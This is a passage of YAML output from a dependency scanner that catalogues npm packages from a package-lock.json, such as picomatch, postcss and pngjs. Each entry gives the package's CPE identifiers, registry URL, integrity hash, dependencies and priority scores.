- cpe: cpe:2.3:a:path-scurry:path-scurry:1.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-scurry:path_scurry:1.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_scurry:path-scurry:1.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_scurry:path_scurry:1.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path-scurry:1.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path_scurry:1.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/path-scurry@1.11.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz
|
|
integrity: sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==
|
|
dependencies:
|
|
lru-cache: ^10.2.0
|
|
minipass: ^5.0.0 || ^6.0.2 || ^7.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: ad5632f7c396e60c
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: path-to-regexp 0.1.13'
|
|
title: path-to-regexp 0.1.13
|
|
description: 'Package discovered: path-to-regexp 0.1.13'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e6c60d0f52ae43b7
|
|
name: path-to-regexp
|
|
version: 0.1.13
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:path-to-regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-to-regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_to_regexp:path-to-regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_to_regexp:path_to_regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-to:path-to-regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path-to:path_to_regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_to:path-to-regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path_to:path_to_regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path-to-regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:path:path_to_regexp:0.1.13:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/path-to-regexp@0.1.13
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-0.1.13.tgz
|
|
integrity: sha512-A/AGNMFN3c8bOlvV9RreMdrv7jsmF9XIfDeCd87+I8RNg6s78BhJxMu69NEMHBSJFxKidViTEdruRwEk/WIKqA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: c2433fd071fcfad6
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: peberminta 0.9.0'
|
|
title: peberminta 0.9.0
|
|
description: 'Package discovered: peberminta 0.9.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f3acb6a3529e1191
|
|
name: peberminta
|
|
version: 0.9.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:peberminta:peberminta:0.9.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/peberminta@0.9.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/peberminta/-/peberminta-0.9.0.tgz
|
|
integrity: sha512-XIxfHpEuSJbITd1H3EeQwpcZbTLHc+VVr8ANI9t5sit565tsI4/xK3KWTUFE2e6QiangUkh3B0jihzmGnNrRsQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: bd0577c6ddbc7f17
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: picocolors 1.1.1'
|
|
title: picocolors 1.1.1
|
|
description: 'Package discovered: picocolors 1.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9b208867cdc8b323
|
|
name: picocolors
|
|
version: 1.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:picocolors:picocolors:1.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/picocolors@1.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz
|
|
integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 2e6faecb84cf8a8b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: picomatch 2.3.2'
|
|
title: picomatch 2.3.2
|
|
description: 'Package discovered: picomatch 2.3.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 0c0ba7fcf7a893f6
|
|
name: picomatch
|
|
version: 2.3.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jonschlinkert:picomatch:2.3.2:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/picomatch@2.3.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz
|
|
integrity: sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 44e51885407159f3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: picomatch 4.0.4'
|
|
title: picomatch 4.0.4
|
|
description: 'Package discovered: picomatch 4.0.4'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 09943c54769c1f79
|
|
name: picomatch
|
|
version: 4.0.4
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:jonschlinkert:picomatch:4.0.4:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/picomatch@4.0.4
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz
|
|
integrity: sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b7793733f0a92625
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: pify 2.3.0'
|
|
title: pify 2.3.0
|
|
description: 'Package discovered: pify 2.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 93c54feee38dbf96
|
|
name: pify
|
|
version: 2.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:pify:pify:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/pify@2.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/pify/-/pify-2.3.0.tgz
|
|
integrity: sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0b578240afa70fcd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: pirates 4.0.7'
|
|
title: pirates 4.0.7
|
|
description: 'Package discovered: pirates 4.0.7'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 47481e92080dd044
|
|
name: pirates
|
|
version: 4.0.7
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:pirates:pirates:4.0.7:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/pirates@4.0.7
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/pirates/-/pirates-4.0.7.tgz
|
|
integrity: sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 72750f8253cdf631
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: png-js 2.0.0'
|
|
title: png-js 2.0.0
|
|
description: 'Package discovered: png-js 2.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 7a0a81fa01919ffb
|
|
name: png-js
|
|
version: 2.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:png-js:png-js:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:png-js:png_js:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:png_js:png-js:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:png_js:png_js:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:png:png-js:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:png:png_js:2.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/png-js@2.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/png-js/-/png-js-2.0.0.tgz
|
|
integrity: sha512-GdzJuUMc6ZSpxFJWVxtOH1bzYHym+TOnveqUjb+VJIbZWbZzyiRGFiKhbiielfpYbgMlhHVhsJ0FTazfuRFkMA==
|
|
dependencies:
|
|
fflate: ^0.8.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 017b0d73e37dad2f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: pngjs 5.0.0'
|
|
title: pngjs 5.0.0
|
|
description: 'Package discovered: pngjs 5.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 33a77729322028df
|
|
name: pngjs
|
|
version: 5.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:pngjs:pngjs:5.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/pngjs@5.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz
|
|
integrity: sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6c2c21065eca2894
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: postcss 8.4.31'
|
|
title: postcss 8.4.31
|
|
description: 'Package discovered: postcss 8.4.31'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: a519bffcd9b56c6d
|
|
name: postcss
|
|
version: 8.4.31
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:postcss:postcss:8.4.31:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/postcss@8.4.31
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz
|
|
integrity: sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==
|
|
dependencies:
|
|
nanoid: ^3.3.6
|
|
picocolors: ^1.0.0
|
|
source-map-js: ^1.0.2
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 87700f6dfcbe47e2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: postcss 8.5.12'
|
|
title: postcss 8.5.12
|
|
description: 'Package discovered: postcss 8.5.12'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 588683a1923c27d7
|
|
name: postcss
|
|
version: 8.5.12
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:postcss:postcss:8.5.12:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/postcss@8.5.12
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/postcss/-/postcss-8.5.12.tgz
|
|
integrity: sha512-W62t/Se6rA0Az3DfCL0AqJwXuKwBeYg6nOaIgzP+xZ7N5BFCI7DYi1qs6ygUYT6rvfi6t9k65UMLJC+PHZpDAA==
|
|
dependencies:
|
|
nanoid: ^3.3.11
|
|
picocolors: ^1.1.1
|
|
source-map-js: ^1.2.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f6953879c586ae44
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: postcss-import 15.1.0'
|
|
title: postcss-import 15.1.0
|
|
description: 'Package discovered: postcss-import 15.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9f2c64d652651310
|
|
name: postcss-import
|
|
version: 15.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:postcss-import:postcss-import:15.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss-import:postcss_import:15.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_import:postcss-import:15.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss_import:postcss_import:15.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss-import:15.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:postcss:postcss_import:15.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/postcss-import@15.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/postcss-import/-/postcss-import-15.1.0.tgz
|
|
integrity: sha512-hpr+J05B2FVYUAXHeK1YyI267J/dDDhMU6B6civm8hSY1jYJnBXxzKDKDswzJmtLHryrjhnDjqqp/49t8FALew==
|
|
dependencies:
|
|
postcss-value-parser: ^4.0.0
|
|
read-cache: ^1.0.0
|
|
resolve: ^1.1.7
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 49a05cdffa8a7ef9
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: postcss-js 4.1.0'
|
|
title: postcss-js 4.1.0
|
|
description: 'Package discovered: postcss-js 4.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9feba814d6f9cb30
|
|
name: postcss-js
|
|
version: 4.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
